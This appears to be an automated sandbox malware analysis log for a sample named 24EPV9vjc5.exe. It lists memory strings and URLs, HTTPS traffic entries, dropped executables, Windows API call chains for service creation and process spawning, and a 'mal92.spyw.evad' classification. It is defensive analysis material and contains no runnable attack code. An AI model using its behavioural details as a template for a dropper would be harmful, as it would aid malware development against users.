Source: RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1645684359.0000000002CBB000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: https://downloads.reneelab.com/download_api.php
Source: RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1645684359.0000000002CBB000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: https://downloads.reneelab.com/download_api.phphttps://downloads.reneelab.com.cn/download_api.php?ac
Source: RescueCDBurner.exe, 00000003.00000001.1634075041.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: https://downloads.reneelab.com/passnow/passnow_
Source: RescueCDBurner.exe, 00000003.00000001.1634075041.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: https://downloads.reneelab.com/passnow/passnow_cnhttps://downloads.reneelab.com.cn/passnow/passnow_x
Source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2300271592.0000000008027000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Edge&DestinationEndpoint=Edge-Prod-EWR31r5c&FrontEnd=AFD
Source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2325278197.000000000800D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
Source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2438917338.0000000002E35000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2456171699.0000000002E36000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2454753020.0000000002E35000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AA1sFuPI?w=168&h=168&q=60&m=6&f=jpg&u=t
Source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2438917338.0000000002E35000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2456171699.0000000002E36000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2454753020.0000000002E35000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AA1sFuPI?w=168&h=168&q=60&m=6&f=jpg&u=tX-Source-Length:
Source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2438917338.0000000002E35000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2456171699.0000000002E36000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2454753020.0000000002E35000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAtK5aP?w=168&h=168&q=60&m=6&f=jpg&u=t
Source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2438917338.0000000002E35000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2456171699.0000000002E36000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2454753020.0000000002E35000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAtK5aP?w=168&h=168&q=60&m=6&f=jpg&u=tLast-Modified:
Source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2325278197.000000000800D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://ntp.msn.com
Source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2325278197.000000000800D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://ntp.msn.com/
Source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2325278197.000000000800D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://ntp.msn.com/X
Source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2325278197.000000000800D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://ntp.msn.com/co
Source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2325278197.000000000800D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
Source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2325278197.000000000800D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://ntp.msn.comd
Source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2325278197.000000000800D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://ntp.msn.comreport-to:
Source: RescueCDBurner.exe, 00000003.00000002.1662531402.0000000009BC5000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1722810735.0000000009F39000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1982900431.000000000546B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: RescueCDBurner.exe, 00000003.00000001.1634075041.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: https://www.reneelab.com
Source: RescueCDBurner.exe, 00000003.00000001.1634075041.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: https://www.reneelab.comwww.reneelab.comhttp://https://0

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746

Source: unknown	HTTPS traffic detected: 172.67.174.91:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.91:443 -> 192.168.2.8:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.91:443 -> 192.168.2.8:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.91:443 -> 192.168.2.8:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.91:443 -> 192.168.2.8:49812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.91:443 -> 192.168.2.8:49813 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.91:443 -> 192.168.2.8:49814 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.91:443 -> 192.168.2.8:49815 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.91:443 -> 192.168.2.8:49816 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.91:443 -> 192.168.2.8:49817 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.91:443 -> 192.168.2.8:49818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.91:443 -> 192.168.2.8:49819 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.91:443 -> 192.168.2.8:49820 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.91:443 -> 192.168.2.8:49821 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.91:443 -> 192.168.2.8:49822 version: TLS 1.2

Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe

Code function: 2_2_5BB43C8C _CreateDesktop_@24,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,GlobalAlloc,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,strcpy,strcpy,CreateDesktopA,lstrlenA,MultiByteToWideChar,GlobalFree,lstrlenA,MultiByteToWideChar,GlobalFree,lstrlenA,MultiByteToWideChar,GlobalFree,lstrlenA,MultiByteToWideChar,GlobalFree,GlobalFree,

2_2_5BB43C8C

Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe

Code function: 2_2_5BB3EEEA _CreateProcessAsUser_@44,SetLastError,newMultiByteFromWideChar,newMultiByteFromWideChar,newMultiByteFromWideChar,memset,newMultiByteFromWideChar,CreateProcessAsUserA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,

2_2_5BB3EEEA

Source: C:\Users\user\Desktop\24EPV9vjc5.exe

File deleted: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe

Jump to behavior

Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 1_2_009C001D	1_2_009C001D
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 1_2_009B41EA	1_2_009B41EA
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 1_2_009962AA	1_2_009962AA
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 1_2_009C03D5	1_2_009C03D5
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 1_2_009BC332	1_2_009BC332
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 1_2_009CA560	1_2_009CA560
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 1_2_009C07AA	1_2_009C07AA
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 1_2_0099A8F1	1_2_0099A8F1
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 1_2_009CAA0E	1_2_009CAA0E
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 1_2_009BFB89	1_2_009BFB89
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 1_2_009C0B6F	1_2_009C0B6F
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 1_2_009C2C18	1_2_009C2C18
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 1_2_009C2E47	1_2_009C2E47
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 1_2_009CEE7C	1_2_009CEE7C
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: 2_2_00BA001D	2_2_00BA001D
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: 2_2_00B941EA	2_2_00B941EA
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: 2_2_00B762AA	2_2_00B762AA
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: 2_2_00BA03D5	2_2_00BA03D5
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: 2_2_00B9C332	2_2_00B9C332
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: 2_2_00BAA560	2_2_00BAA560
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: 2_2_00BA07AA	2_2_00BA07AA
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: 2_2_00B7A8F1	2_2_00B7A8F1
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: 2_2_00BAAA0E	2_2_00BAAA0E
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: 2_2_00B9FB89	2_2_00B9FB89
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: 2_2_00BA0B6F	2_2_00BA0B6F
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: 2_2_00BA2C18	2_2_00BA2C18
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: 2_2_00BAEE7C	2_2_00BAEE7C
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: 2_2_00BA2E47	2_2_00BA2E47
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: 2_2_5BB31FA0	2_2_5BB31FA0
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: 2_2_5BB3FF2C	2_2_5BB3FF2C
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	Code function: 3_2_6C157AF0	3_2_6C157AF0
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	Code function: 3_2_6C157BE0	3_2_6C157BE0

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91

Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	Code function: String function: 6C169A30 appears 66 times
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: String function: 00BB32F3 appears 83 times
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: String function: 00B73821 appears 501 times
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: String function: 00BB0726 appears 34 times
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: String function: 00BB0237 appears 683 times
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: String function: 00B71F13 appears 54 times
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: String function: 009D0726 appears 34 times
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: String function: 009D32F3 appears 83 times
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: String function: 00993821 appears 501 times
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: String function: 00991F13 appears 54 times
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: String function: 009D0237 appears 683 times

Source: LocalCtrl_alpha_v3.exe.5.dr

Static PE information: Resource name: ZIP type: Zip archive data (empty)

Source: fffwkwbrsb.5.dr	Static PE information: Number of sections : 12 > 10
Source: cooisyadg.12.dr	Static PE information: Number of sections : 12 > 10

Source: 24EPV9vjc5.exe, 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameconn.exe8 vs 24EPV9vjc5.exe
Source: 24EPV9vjc5.exe, 00000002.00000000.1611720630.0000000000BDD000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: OriginalFilenameconn.exe8 vs 24EPV9vjc5.exe
Source: 24EPV9vjc5.exe, 00000002.00000002.1636354923.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp	Binary or memory string: OriginalFilenameSQLUNIRL.DLLJ vs 24EPV9vjc5.exe

Source: 24EPV9vjc5.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP

Source: classification engine

Classification label: mal92.spyw.evad.winEXE@64/275@21/16

Source: C:\Users\user\Desktop\24EPV9vjc5.exe

Code function: 1_2_009CFE21 FormatMessageW,GetLastError,LocalFree,

1_2_009CFE21

Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 1_2_009945EE GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,		1_2_009945EE
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: 2_2_00B745EE GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,		2_2_00B745EE

Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe

Code function: 2_2_5BB3CB21 _GetDiskFreeSpaceEx_@16,GetVersionExA,SetLastError,newMultiByteFromWideChar,LoadLibraryW,GetProcAddress,FreeLibrary,GlobalFree,

2_2_5BB3CB21

Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe

Code function: _CreateService_@52,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,CreateServiceA,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,

2_2_5BB42A14

Source: C:\Users\user\Desktop\24EPV9vjc5.exe

Code function: 1_2_009D304F GetModuleHandleA,GetLastError,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CoCreateInstance,ExitProcess,

1_2_009D304F

Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe

Code function: 2_2_5BB37CC0 _FindResource@12,FindResourceW,newMultiByteFromWideChar,newMultiByteFromWideChar,FindResourceA,GlobalFree,GlobalFree,

2_2_5BB37CC0

Source: C:\Users\user\Desktop\24EPV9vjc5.exe

Code function: 1_2_009B6B88 ChangeServiceConfigW,GetLastError,

1_2_009B6B88

Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe

Code function: 2_2_5BB439D2 _StartServiceCtrlDispatcher_@4,lstrlenW,GlobalAlloc,GlobalAlloc,WideCharToMultiByte,StartServiceCtrlDispatcherA,MultiByteToWideChar,GlobalFree,GlobalFree,

2_2_5BB439D2

Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe

File created: C:\Users\user\AppData\Roaming\TaskManage

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7148:120:WilError_03

Source: C:\Users\user\Desktop\24EPV9vjc5.exe

File created: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\

Jump to behavior

Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Command line argument: cabinet.dll	1_2_00991070
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Command line argument: msi.dll	1_2_00991070
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Command line argument: version.dll	1_2_00991070
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Command line argument: wininet.dll	1_2_00991070
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Command line argument: comres.dll	1_2_00991070
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Command line argument: clbcatq.dll	1_2_00991070
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Command line argument: msasn1.dll	1_2_00991070
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Command line argument: crypt32.dll	1_2_00991070
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Command line argument: feclient.dll	1_2_00991070
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Command line argument: cabinet.dll	1_2_00991070
